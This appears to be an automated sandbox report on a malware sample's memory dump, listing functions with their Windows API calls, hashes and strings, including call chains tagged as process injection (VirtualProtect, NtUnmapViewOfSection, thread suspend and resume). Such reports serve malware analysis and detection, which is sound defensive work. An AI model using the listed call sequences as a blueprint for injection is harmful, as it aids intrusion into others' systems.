  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
